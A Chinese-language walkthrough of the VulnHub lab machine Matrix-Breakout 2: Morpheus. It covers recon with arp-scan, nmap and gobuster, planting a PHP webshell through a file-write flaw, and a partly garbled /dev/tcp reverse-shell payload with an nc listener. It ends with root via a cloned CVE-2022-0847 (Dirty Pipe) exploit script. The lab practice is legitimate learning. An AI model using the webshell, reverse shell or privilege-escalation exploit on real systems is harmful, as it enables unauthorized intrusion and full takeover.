记一次靶场渗透 MATRIX-BREAKOUT: 2 MORPHEUS
靶场镜像下载地址: https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova
靶场搭建
1.下载镜像
2.在VM里打开镜像
信息收集
kali 输入 arp-scan -l 判断靶机ip
排除已知的 剩下的就是目标靶机ip 我这里是 192.168.136.137
然后去浏览器访问地址
成功
然后nmap扫一下端口看 21 22 80 这些端口是否开放
nmap -sC -A -sV 192.168.136.137
发现 22 80 81 开放尝试去浏览器访问
访问80没用 访问81需要登入
没有啥有用的 继续进行目录遍历
gobuster dir -u http://192.168.136.137/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php txt
访问 graffiti.php
抓包
发现file 访问file下的地址发现可以 访问 并且post的数据会在该页面下显示
所以我智力直接上传一句话木马 到shell.php
访问shell.php
空白页面说明上传成功
蚁剑链接
这时候发现 蚁剑里显示的文件很少 应该是权限不够被隐藏掉了
这时候利用刚才的方式 直接上传反弹shell
message=& /dev/tcp/ip/端口 0>&1'"); ?> file =wolaile.php
这里注意要把反弹shell一句话进行url编码 或者你先在页面post抓包改file
这时候去kali开启端口监听
nc- vnlp 6666
再去访问wolaile.php
监听成功
提权
接下来就是提权拿下root用户
我先看下各个目录看有没有可以用的没发现 啥 发现一张图片
后面我是上网搜的 漏洞
系统是Linux4.x|5.x 发现有漏洞能直接用CVE-2022-0847
https://gitcode.net/mirrors/r1is/CVE-2022-0847漏洞下载地址
直接 git clone https://gitcode.net/mirrors/r1is/CVE-2022-0847
克隆后 ls
进入到漏洞目录里
然后 chmod +x dirty.sh
给权限 直接运行
恢复原来的密码可以直接获得root权限
进入 /root 目录
拿到flag
后来我改掉密码
登入 那个虚拟机 cd ../../../ 到根目录 发现还有几个flag 被我忽略了
这里有一个是在我之前发现的图片中 大概是misc 图片隐写 图片隐写没太学 所以就没有继续去做了
总结
有兴趣的可以去下载这个靶机做一下 这个靶机还挺有意思 比做CTF有意思多了